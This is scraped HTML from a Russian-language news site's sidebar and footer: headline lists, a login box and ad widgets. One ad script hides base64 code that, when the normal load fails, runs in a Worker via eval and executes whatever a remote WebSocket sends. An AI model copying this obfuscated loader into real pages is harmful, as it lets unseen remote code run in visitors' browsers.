		<div class="b-new-author"><a onclick="ShowProfile('%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2', 'http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2/">Дмитро Снєгирьов</a></div>
    	<strong><a href="http://hronika.info/mnenia/293158-ssha-hochut-zberegti-oblichchya-volodimiru-putnu.html">США хочуть зберегти обличчя Володимиру Путіну</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1872.jpg" />
        <div>31.01.2018|14:45</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9E%D1%85%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9E%D1%85%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80+%D0%9E%D1%85%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%BA%D0%BE/">Александр Охрименко</a></div>
    	<strong><a href="http://hronika.info/mnenia/293157-shpargalka-dlya-nabu-i-amku.html">Шпаргалка для НАБУ и АМКУ</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите Логин:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	<div class="iconfsb" title="Войти через Фейсбук" style="margin-bottom:2px"><a href="https://www.facebook.com/dialog/oauth?client_id=335149143246041&redirect_uri=http%3A%2F%2Fhronika.info%2Findex.php%3Fdo%3Dauth-social%26provider%3Dfc&scope=public_profile%2C+email&display=popup&state=389fd5e8f0e568edf8fe176c591da662&response_type=code" target="_blank"></a></div>
	<div class="icongoogl" title="Войти через Гугл"><a href="https://accounts.google.com/o/oauth2/auth?client_id=100234291277.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Fhronika.info%2Findex.php%3Fdo%3Dauth-social%26provider%3Dgoogle&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile&state=389fd5e8f0e568edf8fe176c591da662&response_type=code" target="_blank"></a></div>
	<div class="iconvk" title="Войти через Вконтакте"><a href="http://oauth.vk.com/authorize?client_id=3098550&redirect_uri=http%3A%2F%2Fhronika.info%2Findex.php%3Fdo%3Dauth-social%26provider%3Dvk&scope=offline%2Cwall%2Cemail&state=389fd5e8f0e568edf8fe176c591da662&response_type=code" target="_blank"></a></div>
	<div class="iconodnokl" title="Войти через Одноклассники"><a href="http://www.odnoklassniki.ru/oauth/authorize?client_id=127300608&redirect_uri=http%3A%2F%2Fhronika.info%2Findex.php%3Fdo%3Dauth-social%26provider%3Dod&response_type=code" target="_blank"></a></div>
	<div class="iconmailr" title="Войти через Мэйл ру"><a href="https://connect.mail.ru/oauth/authorize?client_id=684716&redirect_uri=http%3A%2F%2Fhronika.info%2Findex.php%3Fdo%3Dauth-social%26provider%3Dmailru&state=389fd5e8f0e568edf8fe176c591da662&response_type=code" target="_blank"></a></div>
	<div class="iconyand" title="Войти через Яндекс"><a href="https://oauth.yandex.ru/authorize?client_id=0c58861d413043e2a328a94825d19df1&redirect_uri=http%3A%2F%2Fhronika.info%2Findex.php%3Fdo%3Dauth-social%26provider%3Dyandex&state=389fd5e8f0e568edf8fe176c591da662&response_type=code" target="_blank"></a></div>
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
    <!--Kurs.com.ua main-ukraine 300x130 blue-->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--//Kurs.com.ua main-ukraine 300x130 blue-->    
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<!-- Oblivki teasers block START -->
        <div id="FMg6hQON63UZxhcgPUb0"></div>
        <script>
            (function(d,s,b,id){var js=d.createElement(s);
                window.AD_DOMAIN_URL_SYS_8349582369 = '//leokross.com/';
                js.src='//leokross.com/dUMhXs_Gi9lX/CAKlCSpxvNhYdvtR1w.js';
                d.getElementsByTagName('head')[0].appendChild(js);
                if(typeof d[b]=='undefined') d[b]=[];
                d[b].push(id);})(document,'script','obTBlocks','FMg6hQON63UZxhcgPUb0')
        </script>
        <!-- Oblivki teasers block END -->
<div id="tCTlOMYO"></div>
<script src="http://tdsantcrazy.ru/tCTlOMYO" style="text/javascript"></script>
<!-- -------------Informer block------------- -->
<div id="svtn_inf_29" class="svtn_inf" data-tisid="29"></div>
<!-- ---------------------------------------- -->
<!-- -------------Before </body>------------- -->
<script async="async">
function nmbrsvtn(nma){
  var nmc=false;
  function nmr(){
      if(nmc)return;
      nmc=true;
      nma();
  }
  if(document.addEventListener){
      document.addEventListener("DOMContentLoaded",function(){nmr();},false)}else if   (document.attachEvent){if(document.documentElement.doScroll&&window==window.top){function nmts(){if(nmc)return;if(!document.body)return;try{document.documentElement.doScroll("left");nmr();}catch(e){setTimeout(nmts,100);}}nmts();}document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){nmr();}})}if(window.addEventListener)window.addEventListener("load",nmr,false);else if(window.attachEvent)window.attachEvent("onload",nmr);window.onload=nmr;
}

function start_svtn_tis() {  
var el = document.getElementsByClassName("svtn_inf");
var arr_inf = "";
for (var i = 0; i < el.length; i++) {
if (i == el.length - 1) {
arr_inf = arr_inf + el[i].getAttribute("data-tisid");
}else{
arr_inf = arr_inf + el[i].getAttribute("data-tisid") + "_";
}
}
var el2 = document.getElementsByTagName("body");
var svtnscrpt = document.createElement('script');
svtnscrpt.type = 'text/javascript';
svtnscrpt.src = 'https://svitnews.com/V/get/inf/' + arr_inf;
svtnscrpt.async = 'async';
 el2[0].appendChild(svtnscrpt);
return;
}
function pre_start_svtn_tis(){
if(window.flag_svtn === true){
return;
}
window.flag_svtn = true;

start_svtn_tis();
}
nmbrsvtn(pre_start_svtn_tis);
</script>  
<!-- ---------------------------------------- -->
<script id="r17725" type="text/javascript">
    (function() {
        var worker17725,
            tickerID = 17725,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17725.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vZzRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker17725.postMessage(data);
                }

                worker17725 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17725.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17725.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
<div id="exopay_ad_baner1"></div>
<script>
(function(c,o,u,n,t,e,r){
r = c[u](o); r[n] = t; r.async = 1;
r.onload = function(){c['AliExpressBannerGlobalObject'](e)};
c.body.appendChild(r);
})(document, 'script', 'createElement', 'src', '//alishop6.ru/902dy/src.js');
</script>

<div class="some_class"></div>


    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/292987-nacionalisty-proveli-fakelnyy-marsh-v-chest-geroev-krut-video.html"><span>30.01-09:28</span>
	<strong title="Националисты провели факельный марш в честь героев Крут. Видео">Националисты провели факельный марш в честь героев Крут. Видео</strong></a><b>1490</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/292155-neizvestnye-brosili-kamnem-v-pevicu-ruslanu-video.html"><span>26.01-14:16</span>
	<strong title="Неизвестные бросили камнем в певицу Руслану. Видео">Неизвестные бросили камнем в певицу Руслану. Видео</strong></a><b>7208</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/293386-kadry-napadeniya-na-zhenschinu-v-kieve-video.html"><span>31.01-19:23</span>
	<strong title="Кадры нападения на женщину в Киеве. Видео">Кадры нападения на женщину в Киеве. Видео</strong></a><b>4392</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/293246-rossiyskiy-istorik-i-propagandist-podralis-vo-vremya-pryamogo-efira-video.html"><span>31.01-11:06</span>
	<strong title="Российский историк и пропагандист подрались во время прямого эфира. Видео">Российский историк и пропагандист подрались во время прямого эфира. Видео</strong></a><b>4287</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/rossija/293082-putin-skazal-chto-dumaet-po-povodu-kremlevskogo-doklada.html"><span>30.01-15:26</span>
	<strong title="Путин сказал, что думает по поводу «кремлевского доклада»">Путин сказал, что думает по поводу «кремлевского доклада»</strong></a><b>580</b><div class="category_lastn_date" title="Россия">&nbsp;&nbsp;<a href="http://hronika.info/rossija/">Россия</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/292998-v-rossii-nashli-ukrainskiy-sled-v-filme-o-staline-socseti-smeyutsya.html"><span>30.01-10:07</span>
	<strong title="В России нашли «украинский след» в фильме о Сталине: соцсети смеются">В России нашли «украинский след» в фильме о Сталине: соцсети смеются</strong></a><b>3404</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/292718-boris-aprel-feerichno-vystupil-na-golose-strany-posle-smeny-pola.-video.html"><span>29.01-05:36</span>
	<strong title="Борис Апрель феерично выступил на "Голосе страны" после смены пола. Видео">Борис Апрель феерично выступил на "Голосе страны" после смены пола. Видео</strong></a><b>13138</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/292716-lesya-nikityuk-pohvastalas-figuroy-v-bikini-na-otdyhe-v-afrike.html"><span>29.01-04:46</span>
	<strong title="Леся Никитюк похвасталась фигурой в бикини на отдыхе в Африке">Леся Никитюк похвасталась фигурой в бикини на отдыхе в Африке</strong></a><b>6538</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/292698-kuchu-lvovskogo-musora-snova-sbrosili-vozle-rovno-video.html"><span>28.01-23:29</span>
	<strong title="Кучу львовского мусора снова сбросили возле Ровно. Видео">Кучу львовского мусора снова сбросили возле Ровно. Видео</strong></a><b>1133</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/obwestvo/292670-v-nikolaeve-zafiksirovana-vspyshka-gepatita-a.html"><span>28.01-21:09</span>
	<strong title="В Николаеве зафиксирована вспышка гепатита А">В Николаеве зафиксирована вспышка гепатита А</strong></a><b>902</b><div class="category_lastn_date" title="Общество">&nbsp;&nbsp;<a href="http://hronika.info/obwestvo/">Общество</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/292230-prikolnye-fotki-lyudey-poymannyh-na-goryachem.html"><span>26.01-23:57</span>
	<strong title="Прикольные фотки людей, пойманных «на горячем»">Прикольные фотки людей, пойманных «на горячем»</strong></a><b>28944</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/292183-obezyanka-oblapala-pyshnogruduyu-damu-na-glazah-u-ee-muzha.html"><span>26.01-15:51</span>
	<strong title="Обезьянка облапала пышногрудую даму на глазах у ее мужа">Обезьянка облапала пышногрудую даму на глазах у ее мужа</strong></a><b>19696</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/292983-eto-lish-nachalo-zhitelnica-kitaya-priotkryla-zanaves-zagrobnogo-mira.html"><span>30.01-05:59</span>
	<strong title=""Это - лишь начало": жительница Китая приоткрыла занавес загробного мира">"Это - лишь начало": жительница Китая приоткрыла занавес загробного мира</strong></a><b>18600</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/293103-dvoynik-iznosilsya-socseti-vysmeyali-foto-putina-bez-fotoshopa.html"><span>30.01-16:48</span>
	<strong title="«Двойник износился»: соцсети высмеяли фото Путина без фотошопа">«Двойник износился»: соцсети высмеяли фото Путина без фотошопа</strong></a><b>18394</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/292390-iskusstvennyy-intellekt-rasshifroval-rukopis-voynicha.html"><span>27.01-15:32</span>
	<strong title="Искусственный интеллект расшифровал рукопись Войнича">Искусственный интеллект расшифровал рукопись Войнича</strong></a><b>15170</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/292718-boris-aprel-feerichno-vystupil-na-golose-strany-posle-smeny-pola.-video.html"><span>29.01-05:36</span>
	<strong title="Борис Апрель феерично выступил на "Голосе страны" после смены пола. Видео">Борис Апрель феерично выступил на "Голосе страны" после смены пола. Видео</strong></a><b>13138</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/292521-nastya-kamenskih-progulyalas-po-mayami-v-prozrachnyh-losinah.html"><span>28.01-09:30</span>
	<strong title="Настя Каменских прогулялась по Майами в прозрачных лосинах">Настя Каменских прогулялась по Майами в прозрачных лосинах</strong></a><b>11620</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/obwestvo/293295-v-ukraine-zapretili-populyarnoe-lekarstvo.html"><span>31.01-13:40</span>
	<strong title="В Украине запретили популярное лекарство">В Украине запретили популярное лекарство</strong></a><b>11212</b><div class="category_lastn_date" title="Общество">&nbsp;&nbsp;<a href="http://hronika.info/obwestvo/">Общество</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/292920-zrelischnye-kadry-drift-shkolnogo-avtobusa-po-bezumno-skolzkoy-doroge-video.html"><span>29.01-20:16</span>
	<strong title="Зрелищные кадры: дрифт школьного автобуса по безумно скользкой дороге. Видео">Зрелищные кадры: дрифт школьного автобуса по безумно скользкой дороге. Видео</strong></a><b>9575</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/292316-marazm-krepchaet-v-seti-vysmeyali-novoe-voennoe-pomeshatelstvo-rossiyan.html"><span>27.01-09:12</span>
	<strong title="Маразм крепчает: в Сети высмеяли новое «военное» помешательство россиян">Маразм крепчает: в Сети высмеяли новое «военное» помешательство россиян</strong></a><b>9485</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
              <h3>Интересные новости</h3>
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              <!--noindex -->
<!-- MarketGidNews Start -->
<div id="MarketGidScriptRootN8362" class="news-block-magick">
    <div id="MarketGidPreloadN8362">
        <a id="mg_add8362" href="http://usr.marketgid.com/demo/celevie-posetiteli/" target="_blank"><img src="//cdn.marketgid.com/images/marketgid_add_link.png" style="border:0px"></a><br>        <a href="http://marketgid.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN8362")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN8362");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=8362;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/h/r/hronika.info.8362.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- MarketGidNews End -->
<!--/noindex-->
              <div class="join_informer_3674" id="join_informer_3674"></div>

<!-- Асинхронный код, 10.02.2016 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "//partner.join.com.ua/async/3674/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2016</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t18.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;






КРИМИНАЛ













</b>
              <a class="close7">X</a>
            </div>






<div class="vsplivayushee-okno">
    <span class="spandate">31.01-23:47</span>
	<strong title="ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми"><a href="http://hronika.info/kriminal/293432-dtp-v-nikolaeve-vaz-na-polnoy-skorosti-vletel-v-marshrutku-s-lyudmi.html">ДТП в Николаеве: ВАЗ на полной скорости влетел в</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">31.01-23:23</span>
	<strong title="В Харькове задержана банда грабителей"><a href="http://hronika.info/kriminal/293426-v-harkove-zaderzhana-banda-grabiteley.html">В Харькове задержана банда грабителей</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">31.01-22:23</span>
	<strong title="В Харькове дерзкий грабитель напал на девушку"><a href="http://hronika.info/kriminal/293416-v-harkove-derzkiy-grabitel-napal-na-devushku.html">В Харькове дерзкий грабитель напал на девушку</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">31.01-21:05</span>
	<strong title="Смертельное ДТП с пожаром на Полтавщине: столкнулись три фуры"><a href="http://hronika.info/kriminal/293403-smertelnoe-dtp-s-pozharom-na-poltavschine-stolknulis-tri-fury.html">Смертельное ДТП с пожаром на Полтавщине:</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">31.01-20:41</span>
